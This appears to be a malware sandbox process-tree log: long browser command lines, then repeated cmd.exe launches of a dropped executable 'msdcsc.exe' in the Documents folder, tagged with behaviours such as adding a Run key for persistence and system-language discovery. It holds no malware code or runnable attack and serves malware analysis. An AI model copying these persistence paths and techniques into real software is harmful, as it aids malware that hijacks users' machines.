C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2512,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=2680 /prefetch:134⤵PID:4356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3412,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=3480 /prefetch:14⤵PID:6444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3420,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=3484 /prefetch:14⤵PID:5828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4968,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=5012 /prefetch:14⤵PID:6904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5196,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=5236 /prefetch:144⤵PID:780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5192,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=5256 /prefetch:144⤵PID:4928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5648,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=5656 /prefetch:144⤵PID:1380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6048,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=6076 /prefetch:144⤵PID:1736
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.execookie_exporter.exe --cookie-json=11245⤵PID:6472
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6120,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=6140 /prefetch:144⤵PID:6016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6120,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=6140 /prefetch:144⤵PID:388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=5736,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=5792 /prefetch:14⤵PID:5068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6136,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=3632 /prefetch:144⤵PID:4748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3556,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=6204 /prefetch:144⤵PID:6520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3424,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=3496 /prefetch:144⤵PID:6264
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=5300,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=5392 /prefetch:14⤵PID:6532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5352,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=4172 /prefetch:144⤵PID:1004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --always-read-main-dll --field-trial-handle=5348,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=6200 /prefetch:14⤵PID:4908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --always-read-main-dll --field-trial-handle=6424,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=3668 /prefetch:14⤵PID:236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5372,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=3716 /prefetch:144⤵PID:2364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=6684,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=3672 /prefetch:14⤵PID:1372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=6836,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=6768 /prefetch:14⤵PID:3352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6440,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=6948 /prefetch:144⤵PID:6972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6776,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=6732 /prefetch:144⤵PID:6592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=5676,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=7356 /prefetch:14⤵PID:4500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=6860,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=6872 /prefetch:14⤵PID:7044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=7308,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=7520 /prefetch:14⤵PID:2528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6092,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=3564 /prefetch:144⤵PID:1620
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\script.html3⤵PID:4548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\script.html3⤵PID:6132
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:1196
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5968
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Program Files (x86)\TCP Subsystem\tcpss.exe1⤵PID:2756
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:1984
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:552
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
PID:2284
-
-
C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\wt.exe"C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Microsoft.WindowsTerminal_8wekyb3d8bbwe\wt.exe" -d "C:\Users\Admin\Desktop\."1⤵PID:880
-
C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\WindowsTerminal.exewt.exe -d "C:\Users\Admin\Desktop\."2⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4704 -
C:\Windows\system32\wsl.exeC:\Windows\system32\wsl.exe --list3⤵PID:2476
-
-
C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\OpenConsole.exe"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\OpenConsole.exe" --headless --win32input --resizeQuirk --width 120 --height 27 --signal 0xa1c --server 0xa183⤵PID:776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe3⤵PID:3572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:552
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
PID:1084
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:1088
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
PID:2076
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:4960
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
PID:4192
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:4948
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3108
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:1096
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
PID:4192
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:6032
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
PID:880
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:5640
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
PID:5536
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:5964
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2400
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:3008
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
PID:1096
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:4948
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
PID:776
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:1076
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
PID:4404
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:2076
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
PID:2056
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004C4 0x00000000000004B81⤵PID:1164
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:1264
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5944
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵PID:2216
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeb6efdcf8,0x7ffeb6efdd04,0x7ffeb6efdd102⤵PID:1184
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:3844
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
PID:644
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3544 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffeb6efdcf8,0x7ffeb6efdd04,0x7ffeb6efdd102⤵PID:5384
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1724,i,18059671437679821604,8219690972983204913,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2252 /prefetch:112⤵PID:2336
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=1892,i,18059671437679821604,8219690972983204913,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2176 /prefetch:132⤵PID:5396
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2224,i,18059671437679821604,8219690972983204913,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2220 /prefetch:22⤵PID:4880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,18059671437679821604,8219690972983204913,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3240 /prefetch:12⤵PID:2132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3172,i,18059671437679821604,8219690972983204913,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3268 /prefetch:12⤵PID:3400
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4132,i,18059671437679821604,8219690972983204913,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4444 /prefetch:12⤵PID:6188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4712,i,18059671437679821604,8219690972983204913,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5040 /prefetch:142⤵PID:6520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=5248,i,18059671437679821604,8219690972983204913,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5280 /prefetch:12⤵PID:6856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵PID:5372
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeb6efdcf8,0x7ffeb6efdd04,0x7ffeb6efdd102⤵PID:1132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵PID:2340
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeb6efdcf8,0x7ffeb6efdd04,0x7ffeb6efdd102⤵PID:3036
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵PID:3164
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffeb6efdcf8,0x7ffeb6efdd04,0x7ffeb6efdd102⤵PID:4612
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:5752
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
PID:3684
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}1⤵PID:3684
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:4092
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:6768
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7028
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:7084
-
